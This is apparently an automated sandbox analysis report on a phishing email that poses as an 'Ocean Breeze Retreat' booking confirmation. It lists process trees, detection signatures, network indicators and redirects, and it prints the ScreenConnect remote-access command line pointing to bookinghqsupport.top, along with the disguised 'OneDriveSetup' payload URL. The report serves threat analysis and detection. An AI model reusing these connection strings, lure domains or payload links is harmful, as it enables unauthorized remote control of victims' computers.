Edit tour

Windows Analysis Report
Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg

Overview

General Information

Sample name:Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg
Analysis ID:1632450
MD5:3a01d6a3cf44ee40632cdb0b40c36624
SHA1:13993d0144d3136e7ad9082e65450db0e1c12f03
SHA256:3bbc9f13f9ed9195ed633f8fa78be3ccc3336934ba79954a31cca0daba6b4158
Infos:

Detection

ScreenConnect Tool
Score:76
Range:0 - 100
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
AI detected suspicious elements in Email content
Changes security center settings (notifications, updates, antivirus, firewall)
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Office Autorun Keys Modification
Stores large binary data to the registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6892 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 7012 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "45AE51B9-404E-41AC-B6B3-06509E284573" "2B13D4B0-6C0C-40D8-AAB1-E470D827B26A" "6892" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 7336 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://cl.s12.exct.net/?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 7604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2028,i,4087323018114762375,9119903113655532610,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • OneDriveSetup (1).exe (PID: 2004 cmdline: "C:\Users\user\Downloads\OneDriveSetup (1).exe" MD5: 911525671C9FD23005A07459B729B754)
        • msiexec.exe (PID: 1760 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.4.4.9118\d241e538b9eb3f0a\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • chrome.exe (PID: 7404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://cl.s12.exct.net/?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • svchost.exe (PID: 6260 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5692 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • HxOutlook.exe (PID: 6564 cmdline: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe" -ServerName:microsoft.windowslive.mail.AppXfbjsbkxvprcgqg6q4c9jfr0pn3kv9x5s.mca MD5: 6F8EAC2C377C8F16D91CB5AC8B8DBF5F)
  • svchost.exe (PID: 6524 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2340 cmdline: C:\Windows\System32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3088 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 3008 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 6764 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6184 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 2588 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6428 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s lfsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • HxAccounts.exe (PID: 7172 cmdline: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe" -ServerName:microsoft.windowslive.manageaccounts.AppXdbf3yp5apt3t7q877db3gnz5zqpf71zj.mca MD5: 6FEB00C9A2C3FF66230658B3012BAB6A)
  • svchost.exe (PID: 7404 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7440 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msiexec.exe (PID: 2660 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7776 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0F46587D044F7C61BD85AC8DFD726F62 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 8152 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI436F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5653593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 2112 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 031E0E48DE3D13F9D2BD5DCF3BCB9F6E MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 3488 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 92F38BA88A466C77B1F7FCBAC077F3D4 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 772 cmdline: "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bookinghqsupport.top&p=8041&s=8d8131d8-05a3-44ca-a0f5-2c7287519a41&k=BgIAAACkAABSU0ExAAgAAAEAAQCt6sszjYdR%2fljMO5hPN8Us4uYaE1KfX0EMr5MgD6WzfJDx5V16IAULD7anuBGtX0F3LF1idCdY6kpNAJJAQDV62l1xEtKhzqEJfLAHnrYNkI4IgddX3uDlj%2bQ5ccf18AynIy9sXt2XekatDPx%2bHEawZxuMC46pODU5uafzSkOJ3zhdQfKucobIYw%2f65wL6MiNAHyNGePUbZTnU97ItnoW%2bN22p2gzqZziqkFuuwABhjcLPNBQHLNuuKEC1vR2lxX3EzdRdKmLntP6LMt39dgW8sSIitIZom5OMFnV7U8H8LA819gdb3BqbA%2fSR%2fj57hzMJtK78Yzxu2%2fz9YPP9DzDB&c=OneDriveSetup%20FB&c=&c=&c=&c=&c=&c=&c=" MD5: D3E628C507DC331BAB3DE1178088C978)
    • ScreenConnect.WindowsClient.exe (PID: 3096 cmdline: "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe" "RunRole" "9f785d80-c7b6-460e-b2b7-083465355376" "User" MD5: AFA993C978BC52D51E8AF08A02892B4E)
    • ScreenConnect.WindowsClient.exe (PID: 4600 cmdline: "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe" "RunRole" "685ea6e3-f4f1-4a5d-b64b-7c74b24aed78" "System" MD5: AFA993C978BC52D51E8AF08A02892B4E)
  • WINWORD.EXE (PID: 5476 cmdline: "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • sppsvc.exe (PID: 5112 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • mmc.exe (PID: 7992 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc" MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)
  • mmc.exe (PID: 980 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc" MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)
  • cleanup
SourceRuleDescriptionAuthorStrings
C:\Users\user\Downloads\eda2c7bf-7eeb-4af6-a518-8725894275d2.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\Downloads\Unconfirmed 111805.crdownloadJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Temp\~DFD365F17729FDCDF2.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Installer\inprogressinstallinfo.ipiJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          C:\Windows\Temp\~DFCA3227996840FADD.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Click to see the 21 entries
            SourceRuleDescriptionAuthorStrings
            00000013.00000000.1809633017.0000000000446000.00000002.00000001.01000000.0000000D.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000013.00000002.1834609850.0000000005BA0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                0000001D.00000000.1894571066.0000000000D42000.00000002.00000001.01000000.0000001A.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000013.00000002.1838178371.00000000079F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    00000013.00000002.1827940305.0000000003371000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      Click to see the 2 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bookinghqsupport.top&p=8041&s=8d8131d8-05a3-44ca-a0f5-2c7287519a41&k=BgIAAACkAABSU0ExAAgAAAEAAQCt6sszjYdR%2fljMO5hPN8Us4uYaE1KfX0EMr5MgD6WzfJDx5V16IAULD7anuBGtX0F3LF1idCdY6kpNAJJAQDV62l1xEtKhzqEJfLAHnrYNkI4IgddX3uDlj%2bQ5ccf18AynIy9sXt2XekatDPx%2bHEawZxuMC46pODU5uafzSkOJ3zhdQfKucobIYw%2f65wL6MiNAHyNGePUbZTnU97ItnoW%2bN22p2gzqZziqkFuuwABhjcLPNBQHLNuuKEC1vR2lxX3EzdRdKmLntP6LMt39dgW8sSIitIZom5OMFnV7U8H8LA819gdb3BqbA%2fSR%2fj57hzMJtK78Yzxu2%2fz9YPP9DzDB&c=OneDriveSetup%20FB&c=&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bookinghqsupport.top&p=8041&s=8d8131d8-05a3-44ca-a0f5-2c7287519a41&k=BgIAAACkAABSU0ExAAgAAAEAAQCt6sszjYdR%2fljMO5hPN8Us4uYaE1KfX0EMr5MgD6WzfJDx5V16IAULD7anuBGtX0F3LF1idCdY6kpNAJJAQDV62l1xEtKhzqEJfLAHnrYNkI4IgddX3uDlj%2bQ5ccf18AynIy9sXt2XekatDPx%2bHEawZxuMC46pODU5uafzSkOJ3zhdQfKucobIYw%2f65wL6MiNAHyNGePUbZTnU97ItnoW%2bN22p2gzqZziqkFuuwABhjcLPNBQHLNuuKEC1vR2lxX3EzdRdKmLntP6LMt39dgW8sSIitIZom5OMFnV7U8H8LA819gdb3BqbA%2fSR%2fj57hzMJtK78Yzxu2%2fz9YPP9DzDB&c=OneDriveSetup%20FB&c=&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bookinghqsupport.top&p=8041&s=8d8131d8-05a3-44ca-a0f5-2c7287519a41&k=BgIAAACkAABSU0ExAAgAAAEAAQCt6sszjYdR%2fljMO5hPN8Us4uYaE1KfX0EMr5MgD6WzfJDx5V16IAULD7anuBGtX0F3LF1idCdY6kpNAJJAQDV62l1xEtKhzqEJfLAHnrYNkI4IgddX3uDlj%2bQ5ccf18AynIy9sXt2XekatDPx%2bHEawZxuMC46pODU5uafzSkOJ3zhdQfKucobIYw%2f65wL6MiNAHyNGePUbZTnU97ItnoW%2bN22p2gzqZziqkFuuwABhjcLPNBQHLNuuKEC1vR2lxX3EzdRdKmLntP6LMt39dgW8sSIitIZom5OMFnV7U8H8LA819gdb3BqbA%2fSR%2fj57hzMJtK78Yzxu2%2fz9YPP9DzDB&c=OneDriveSetup%20FB&c=&c=&c=&c=&c=&c=&c=", ProcessId: 772, ProcessName: ScreenConnect.ClientService.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (d241e538b9eb3f0a) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 2660, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-13DB-35F7EAAA7A38}\(Default)
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6892, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc, ProcessId: 6260, ProcessName: svchost.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      Phishing

                      barindex
                      Source: https://bookingmanageview.com/lnvoice/B-37288321/Joe Sandbox AI: Page contains button: 'Redownload Document' Source: '1.3.pages.csv'
                      Source: EmailJoe Sandbox AI: Detected potential phishing email: The sender email domain is highly suspicious and does not match the claimed Ocean Breeze business (uses a long, random-looking salesforce subdomain). The email contains multiple tracking and redirect links with suspicious domains (cl.s12.exct.net). Despite appearing professional, the email uses pressure tactics and includes clickable links for reservation management, which is typical of phishing attempts
                      Source: https://bookingmanageview.com/lnvoice/B-37288321/HTTP Parser: Base64 decoded: 1741386798.000000
                      Source: EmailClassification: Credential Stealer
                      Source: https://oceanbreeze.com/landerHTTP Parser: No favicon
                      Source: https://oceanbreeze.com/landerHTTP Parser: No favicon
                      Source: C:\Windows\System32\msiexec.exeFile opened: z:
                      Source: C:\Windows\System32\msiexec.exeFile opened: x:
                      Source: C:\Windows\System32\msiexec.exeFile opened: v:
                      Source: C:\Windows\System32\msiexec.exeFile opened: t:
                      Source: C:\Windows\System32\msiexec.exeFile opened: r:
                      Source: C:\Windows\System32\msiexec.exeFile opened: p:
                      Source: C:\Windows\System32\msiexec.exeFile opened: n:
                      Source: C:\Windows\System32\msiexec.exeFile opened: l:
                      Source: C:\Windows\System32\msiexec.exeFile opened: j:
                      Source: C:\Windows\System32\msiexec.exeFile opened: h:
                      Source: C:\Windows\System32\msiexec.exeFile opened: f:
                      Source: C:\Windows\System32\svchost.exeFile opened: d:
                      Source: C:\Windows\System32\msiexec.exeFile opened: b:
                      Source: C:\Windows\System32\msiexec.exeFile opened: y:
                      Source: C:\Windows\System32\msiexec.exeFile opened: w:
                      Source: C:\Windows\System32\msiexec.exeFile opened: u:
                      Source: C:\Windows\System32\msiexec.exeFile opened: s:
                      Source: C:\Windows\System32\msiexec.exeFile opened: q:
                      Source: C:\Windows\System32\msiexec.exeFile opened: o:
                      Source: C:\Windows\System32\msiexec.exeFile opened: m:
                      Source: C:\Windows\System32\msiexec.exeFile opened: k:
                      Source: C:\Windows\System32\msiexec.exeFile opened: i:
                      Source: C:\Windows\System32\msiexec.exeFile opened: g:
                      Source: C:\Windows\System32\msiexec.exeFile opened: e:
                      Source: C:\Windows\System32\mmc.exeFile opened: c:
                      Source: C:\Windows\System32\msiexec.exeFile opened: a:
                      Source: chrome.exeMemory has grown: Private usage: 7MB later: 38MB

                      Networking

                      barindex
                      Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL Service
                      Source: global trafficTCP traffic: 192.168.2.16:49781 -> 199.127.62.110:8041
                      Source: global trafficTCP traffic: 192.168.2.16:49818 -> 1.1.1.1:53
                      Source: global trafficTCP traffic: 192.168.2.16:49818 -> 1.1.1.1:53
                      Source: global trafficTCP traffic: 192.168.2.16:49818 -> 1.1.1.1:53
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: cl.s12.exct.net to https://skillsyne.us/mymanagedtl
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: cl.s12.exct.net to https://skillsyne.us/mymanagedtl
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: bitbucket.org to https://bbuseruploads.s3.amazonaws.com/7efcf163-7ea0-4026-9851-6a4913a3f3f6/downloads/0b7cd0a7-2609-4f79-b2f4-29338930ef75/onedrivesetup.exe?response-content-disposition=attachment%3b%20filename%3d%22onedrivesetup.exe%22&awsaccesskeyid=asia6kose3bnoi3awrxw&signature=uvjrf4lpfl%2bobrztrgtqpwq4jcq%3d&x-amz-security-token=iqojb3jpz2lux2vjeacacxvzlwvhc3qtmsjhmeuciqcgmsplx0uw72pgadtpc1xfeekgv0nryuqpnwqyywcxkqigendcid7amnuaespseefl3yhgzqp3tu3zifxt8245m9gqpwiiubaaggw5odq1mjuxmdexndyidcmvxvvrmzlgfck5xcqeaqm27j2pvy4pvbh0tzdiyo4unrvpedazerhma86uiviegfs3oegofnwhjufwlhekxwgq4qu3xn9ajo7xm3naiz8xhgd8p0p7aakvvoqw0wc%2fa6dnll6ry%2bm6y%2foiid0ixdjkj46sfuujanfv0bgmh%2f%2bypaogbd15edbfz4%2fb6b7pza6xhro70ujqnr9uvbumywb3nloohu%2b3kcz4hlo81g4r9errk3xkxq3ig4kjurkvlpenda80mbxrkqtgsrsbor9jr4vocvcakgrez2cxtuxiida2snlwcumk05m9njwzvm4k%2fb3uvzyotwnw1tjpfvk21seiu4asfgz3sn0g4zzrpbhhmilorb4gop0bwr%2bxptm3uwqjqz7n5oep1ydm07iivzkspcbullyi9ee9kqut6pj6cknfg1rgrkbnzgks6gmyziyewt7hewlhtsqqzui%2ftv2mua%2br1pzk%2byculq2fzead2spgi0mseuprevu2rlmoc6m%2bifhm8d6wa6c%2bsw2bjedblgjmf2lgv28%2bev8qu9m1uxxe1bmgdogsg7ffpqhjagdcyklkcw%3d%3d&expires=1741388554
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: bitbucket.org to https://bbuseruploads.s3.amazonaws.com/7efcf163-7ea0-4026-9851-6a4913a3f3f6/downloads/0b7cd0a7-2609-4f79-b2f4-29338930ef75/onedrivesetup.exe?response-content-disposition=attachment%3b%20filename%3d%22onedrivesetup.exe%22&awsaccesskeyid=asia6kose3bnoi3awrxw&signature=uvjrf4lpfl%2bobrztrgtqpwq4jcq%3d&x-amz-security-token=iqojb3jpz2lux2vjeacacxvzlwvhc3qtmsjhmeuciqcgmsplx0uw72pgadtpc1xfeekgv0nryuqpnwqyywcxkqigendcid7amnuaespseefl3yhgzqp3tu3zifxt8245m9gqpwiiubaaggw5odq1mjuxmdexndyidcmvxvvrmzlgfck5xcqeaqm27j2pvy4pvbh0tzdiyo4unrvpedazerhma86uiviegfs3oegofnwhjufwlhekxwgq4qu3xn9ajo7xm3naiz8xhgd8p0p7aakvvoqw0wc%2fa6dnll6ry%2bm6y%2foiid0ixdjkj46sfuujanfv0bgmh%2f%2bypaogbd15edbfz4%2fb6b7pza6xhro70ujqnr9uvbumywb3nloohu%2b3kcz4hlo81g4r9errk3xkxq3ig4kjurkvlpenda80mbxrkqtgsrsbor9jr4vocvcakgrez2cxtuxiida2snlwcumk05m9njwzvm4k%2fb3uvzyotwnw1tjpfvk21seiu4asfgz3sn0g4zzrpbhhmilorb4gop0bwr%2bxptm3uwqjqz7n5oep1ydm07iivzkspcbullyi9ee9kqut6pj6cknfg1rgrkbnzgks6gmyziyewt7hewlhtsqqzui%2ftv2mua%2br1pzk%2byculq2fzead2spgi0mseuprevu2rlmoc6m%2bifhm8d6wa6c%2bsw2bjedblgjmf2lgv28%2bev8qu9m1uxxe1bmgdogsg7ffpqhjagdcyklkcw%3d%3d&expires=1741388554
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: bitbucket.org to https://bbuseruploads.s3.amazonaws.com/7efcf163-7ea0-4026-9851-6a4913a3f3f6/downloads/0b7cd0a7-2609-4f79-b2f4-29338930ef75/onedrivesetup.exe?response-content-disposition=attachment%3b%20filename%3d%22onedrivesetup.exe%22&awsaccesskeyid=asia6kose3bnoi3awrxw&signature=uvjrf4lpfl%2bobrztrgtqpwq4jcq%3d&x-amz-security-token=iqojb3jpz2lux2vjeacacxvzlwvhc3qtmsjhmeuciqcgmsplx0uw72pgadtpc1xfeekgv0nryuqpnwqyywcxkqigendcid7amnuaespseefl3yhgzqp3tu3zifxt8245m9gqpwiiubaaggw5odq1mjuxmdexndyidcmvxvvrmzlgfck5xcqeaqm27j2pvy4pvbh0tzdiyo4unrvpedazerhma86uiviegfs3oegofnwhjufwlhekxwgq4qu3xn9ajo7xm3naiz8xhgd8p0p7aakvvoqw0wc%2fa6dnll6ry%2bm6y%2foiid0ixdjkj46sfuujanfv0bgmh%2f%2bypaogbd15edbfz4%2fb6b7pza6xhro70ujqnr9uvbumywb3nloohu%2b3kcz4hlo81g4r9errk3xkxq3ig4kjurkvlpenda80mbxrkqtgsrsbor9jr4vocvcakgrez2cxtuxiida2snlwcumk05m9njwzvm4k%2fb3uvzyotwnw1tjpfvk21seiu4asfgz3sn0g4zzrpbhhmilorb4gop0bwr%2bxptm3uwqjqz7n5oep1ydm07iivzkspcbullyi9ee9kqut6pj6cknfg1rgrkbnzgks6gmyziyewt7hewlhtsqqzui%2ftv2mua%2br1pzk%2byculq2fzead2spgi0mseuprevu2rlmoc6m%2bifhm8d6wa6c%2bsw2bjedblgjmf2lgv28%2bev8qu9m1uxxe1bmgdogsg7ffpqhjagdcyklkcw%3d%3d&expires=1741388554
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: onedrive.live.com to https://www.microsoft.com/microsoft-365/onedrive/online-cloud-storage
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: onedrive.live.com to https://www.microsoft.com/microsoft-365/onedrive/online-cloud-storage
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
